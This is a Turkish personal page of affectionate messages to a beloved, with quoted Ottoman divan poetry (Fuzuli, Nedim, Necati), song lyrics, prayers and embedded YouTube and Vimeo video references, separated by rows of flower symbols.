\u00f6zlem.\n\nvideo::255248711[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00d6zledim...\n\nvideo::255248790[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::efpvLTrg7_o[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00fcnayd\u0131n...\ud83c\udf38\ud83c\udf3a \n\nvideo::m9gZyhNPYdY[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBekir Bey de olmasa nas\u0131l derdim ben? \n\nvideo::2AE9iCE0Asw[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHuzuru sesinizde bulmu\u015fum efendim.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir zamanlar, kimine k\u0131sa kimine uzundu vakitler. Kimi saniyelerle tartard\u0131 vakti bir avare nefesle, kalbin her at\u0131m\u0131yla. Yanmak m\u0131 denir, t\u00fctmek mi bilmezdi, bilmez. \u0130\u015fte o zamanlar bir ses duyar\u0131m, ah O'ndan bir iz bulurum diye d\u00fc\u015ft\u00fc\u011f\u00fc \u00e7emende \u015f\u00f6yle deyivermi\u015f O, eh fukara g\u00f6n\u00fcl bu bana olayd\u0131 ke\u015fke demi\u015f i\u00e7ini \u00e7ekerek: +\n\n_\"Nice arz edem hele saz-\u0131 dil-i dildara ben_ +\n_Name g\u00f6ndersem kebuter iltemez biryan olur\"_ +\n\nSonras\u0131nda haddini a\u015f\u0131p \u015f\u00f6yle yaz\u0131vermi\u015f bizim pervaneve\u015f g\u00f6n\u00fcl sahibi: +\n\n_\"Hayalinde vard\u0131r a\u015f\u0131kun vuslat ey ahsen_ +\n_Ma\u015fuk okur mektubu h\u00e2kister-i kefterden_ +\n_Ama naz ed\u00fcp a\u015f\u0131k\u0131na elem ilen dersin sen_ +\n_Nice arz edem hele saz-\u0131 dil-i dildara ben_ +\n_Name g\u00f6ndersem kebuter iltemez biryan olur\"_ +\n\nB\u00f6ylesine hadsizli\u011fe iten de nedir bizim avareyi?\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSadettin Hoca dinletiverdi: \n\n_\"A\u015fk\u0131nd\u0131r bana g\u00fczelim y\u00e2dig\u00e2r\"_\n\nvideo::rdn0VZuoiss[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi ki do\u011fmu\u015f o Mahr\u00fb! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir yan\u0131 siz olan \"biz\"ler ne g\u00fczel.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi geceler, Allah'a emanet olunuz. Zat\u0131n\u0131za ho\u015f\u00e7a bak\u0131n \ud83d\ude0a\ud83d\ude0a \n\n_Sizi rahats\u0131z etmekten \u00e7ekinerek buraya d\u00fc\u015f\u00fcrd\u00fcm yolumu. Art\u0131k ne vakit u\u011frad\u0131ysan\u0131z \u00f6yle olsun. \u0130yi sabahlar, iyi ak\u015famlar, iyi g\u00fcnler..._\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-Ne dersin Pervane, bizim de pabucumuz dama at\u0131l\u0131r m\u0131? +\n-Sen kendi derdine yan efendi. Ben hep yan\u0131nday\u0131m Mahr\u00fb'nun. Hem ne utanmaz adams\u0131n sen, sabiyi mi k\u0131skanacaks\u0131n? +\n-Aman esta\u011ffurullah yanl\u0131\u015f anlatt\u0131m galiba. K\u0131skanmak de\u011fil benimki. Kenara itilmekten korkmak sadece. Hem o minik masumu, teyzo\u015funun g\u00f6rmesini koklamas\u0131n\u0131 ne kadar istedi\u011fimi bilmez gibi konu\u015fuyorsun. Demem o ki sen yan\u0131na u\u011frars\u0131n mutlaka halimi arz et. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::D9A6zrFojj8[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSaat, 3 olsun diye can atadursun, bug\u00fcn buradan sesleneyim olur mu efendim?\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\"K\u0131zmay\u0131n \ud83d\udc40\" ifafesi \u015fakadan ba\u015fka nedir ki? Yeri geldi\u011finde k\u0131z\u0131n, ka\u015f \u00e7at\u0131n efendim. Ama biliniz ki e\u011fer bir an hata etti\u011fi olursa bile isteye hataya d\u00fc\u015fmemi\u015ftir bu Pervane.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNecati Beg nas\u0131l da hakl\u0131s\u0131n sab\u00e2dan hesab\u0131n\u0131 sormal\u0131. \n\n_Ey sab\u00e2 yabanda m\u0131 buldun aya\u011f\u0131 topra\u011f\u0131n_ +\n_Her g\u00f6ze ol t\u00fbty\u00e2y\u0131 r\u00e2yeg\u00e2n vermek neden_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nCan\u0131m efendim\n\nvideo::2hq8rHNsxfw[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_M\u00fcbtel\u00e2_ kelimesi nas\u0131l ge\u00e7iyordu? Anlam\u0131 i\u00e7in s\u00f6zl\u00fckleri kar\u0131\u015ft\u0131rmaya ne hacet, bu acize bak\u0131p g\u00f6rmek varken. \n\nvideo::Ebvr2nFovCM[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::hcRl8wsIlAs[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPeki, olur efendim. Yani in\u015fallah :))\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n \nFuzuli ilk m\u0131sray\u0131 bana bak\u0131p yazm\u0131\u015f onu anlad\u0131m lakin ikinci m\u0131sra size midir acaba? \ud83d\udc40 \n\n_\"Olmad\u0131 ol m\u00e2ha r\u00fb\u015fen yandu\u011fum hicr\u00e2n g\u00fcn\u00fc_ +\n_Yandu\u011fun \u015feb t\u00e2 seher \u015fem'\u00fcn ne bils\u00fcn \u00e2fit\u00e2b_ +\n\n(Ayr\u0131l\u0131k g\u00fcn\u00fc yand\u0131\u011f\u0131mdan o ay gibi g\u00fczel haberd\u00e2r olmad\u0131, yani bu hadise ona ayd\u0131nlanmad\u0131. Mumun gece sabaha kadar yand\u0131\u011f\u0131n\u0131 g\u00fcne\u015f ne bilsin.)\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nKalem olsayd\u0131m efendim eliniz de\u011ferdi, ka\u011f\u0131t olsayd\u0131m efendim y\u00fcz\u00fcn\u00fcz bana d\u00f6nerdi. Heyhat insan olup Yemen'de kalm\u0131\u015f\u0131m. Yemen'deki de yan\u0131n\u0131zdad\u0131r \u00f6yle ya, az kals\u0131n unutup \u00fcz\u00fclecektim. +\n\nSiz yan\u0131mdas\u0131n\u0131z her an her vakit.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00fcn boyunca ka\u00e7 kere demek istedim, yutkundum. Hem bu kadar isteyip hem de bu kadar s\u00f6ylemekten \u00e7ekinmek garip. S\u00f6ylemek istedi\u011fim c\u00fcmleyi zaten biliyorsunuz \ud83d\udc40 \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_..._ +\n_yanl\u0131\u015f anla\u015f\u0131lmas\u0131 muhtemel, kald\u0131r\u0131ld\u0131 :) _ +\n_..._\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi ki vars\u0131n\u0131z efendim. Yaz\u0131y\u0131 g\u00f6rd\u00fc\u011f\u00fcn\u00fczde g\u00fcl\u00fcms\u00fcyorumdur size do\u011fru. \ud83d\ude0c\ud83d\ude0c \n\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\"Can\u0131m efendim\", ay y\u00fczl\u00fc g\u00fcl y\u00fczl\u00fc efendim... \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nLaleler a\u00e7t\u0131\n\nvideo::vMbjeQl_FdY[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBa\u015fka bir sesten tekrar etsek \ud83d\udc40 \n\n_Aman aman aman aaah gel yan\u0131ma_ +\n_Ahu g\u00f6zl\u00fcm \u015firin s\u00f6zl\u00fcm_ +\n_Aaaaah k\u0131z\u0131l han\u00e7erim_ +\n_\u00c7a\u011f\u0131r can\u0131ma aks\u0131n kan\u0131m_ +\n_Kurbanam o cana men_ +\n_Aaaaah_\n\nvideo::Y6vbfX0i5Hw[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::vg8WGEr-dPU[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Ya Rab sevdi\u011fimle beraber eyle_ +\n_G\u00f6nl\u00fcm\u00fc c\u00e2n\u0131m\u0131 her bir \u00e2n\u0131m\u0131_\n\nAmin amin amin...\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Hep sen vars\u0131n\"_ \ud83d\udc95 \n\nvideo::VXNISYc8uNI[youtube]\n\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\ud83c\udf37\ud83c\udf37 \n\nvideo::74R3ku58-t0[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::jSdJ7gr1-IE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"A\u015fk-\u0131 p\u00e2k\u00fcn gam\u0131yla \u015f\u00e2d eyle_ +\n_Y\u00e2r vasl\u0131yla ber-murad eyle\"_ \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\nvideo::fdv_Bki-2aI[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSiz rahats\u0131z etti\u011finizi san\u0131yorsunuz, bense derdini benle payla\u015facak kadar de\u011fer veriyor bana deyip mutlu oluyorum. Dert y\u00fcz\u00fc g\u00f6rmeyin, g\u00f6recek olursan\u0131z -hay\u0131r, hay\u0131r olursan\u0131z de\u011fil- olursak yan\u0131n\u0131zday\u0131m. Dert orta\u011f\u0131n\u0131z, s\u0131rda\u015f\u0131n\u0131z, refikiniz olabilsem ne b\u00fcy\u00fck bahtiyarl\u0131k...\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBuras\u0131 bir m\u00fcddet \u00f6ks\u00fcz kald\u0131. \n\nAbdurrahim Karako\u00e7 Beyefendi kimin i\u00e7in s\u00f6yledi bilmiyorum ama ben s\u00f6ylersem kim oldu\u011fu bellidir :)\n\n_\"A\u015fktan yana s\u00f6z duyunca_ +\n_Ben hep seni d\u00fc\u015f\u00fcn\u00fcr\u00fcm._ +\n_U\u00e7suz hayaller boyunca_ +\n_Ben hep seni d\u00fc\u015f\u00fcn\u00fcr\u00fcm.\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNedim ne g\u00fczel demi\u015f...\n\n_\"Sevdi\u011fim cem\u00e2lin \u00e7\u00fcnkim g\u00f6remem_ +\n_\u00c7\u0131kmas\u0131n hay\u00e2lin dil-i \u015feyd\u00e2dan_ +\n_H\u00e2k-i p\u00e2ye \u00e7\u00fcnki y\u00fczler s\u00fcremem_ +\n_Alay\u0131m pey\u00e2m\u0131n b\u00e2d-\u0131 sab\u00e2dan\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\ud83c\udf37\ud83c\udf39\u2764\ufe0f\n\nvideo::6CmU7vvmVxw[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_G\u00f6nl\u00fcm senin esirin, kalbim senin yerindir_\n\nvideo::s2KQlEfbeRI[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::cDIkxp44qak[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir de \u00f6zlem var. Sanki bu duygu beni hi\u00e7 terketmeyecek. +\n\u00c7ok \u00f6zledim.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00f6nl\u00fcme nak\u015fedilen foto\u011fraf\u0131 hi\u00e7 silmedim. T\u00fcm foto\u011fraflardan g\u00fczel o. +\n\nBen de derim ne demi\u015fse Bekir Bey.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Nesin a sen a g\u00fczel_\n\nvideo::vweKToC3gu0[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_D\u00fbr etme yan\u0131ndan asla bendeni ey k\u00e2\u015f-\u0131 keman_\n\nvideo::mmbPHRfJsOg[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNe kadar da g\u00fczel de\u011fil mi? +\n\u00c7\u00fcnk\u00fc O bunu be\u011feniyormu\u015f.\n\nvideo::ml0yoRT_e2c[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nGarip bir h\u00fcz\u00fcn var bu \u015fark\u0131da sizi al\u0131p getiren\n\nvideo::Qprmq3Ol27A[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi ki vars\u0131n\u0131z. Vars\u0131n\u0131z ya bu garip bir liman buldu u\u00e7suz bucaks\u0131z bu ummanda \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir tanesiniz siz bir tane... Yan\u0131mda oldu\u011funuzu bileyim, ayn\u0131 hayali kurdu\u011fumuzu bileyim beklerim. \ud83d\udc90\ud83d\udc90\ud83d\udc90 \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHer\u015feye de c\u0131k \ud83d\ude00 \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir yuva hayal ediyorum.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130n\u015fallah bir yol bulunur diye hep \u00fcmit ediyorum. \u00dcmit de bir \u00e7e\u015fit duad\u0131r. Sen, ben, ailelerimiz kimse \u00fcz\u00fclmesin, zorda kalmas\u0131n :)\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNe g\u00fczel seni s\u00f6ylemek \u00e7i\u00e7eklere. Ne g\u00fczel senden konu\u015fmak. 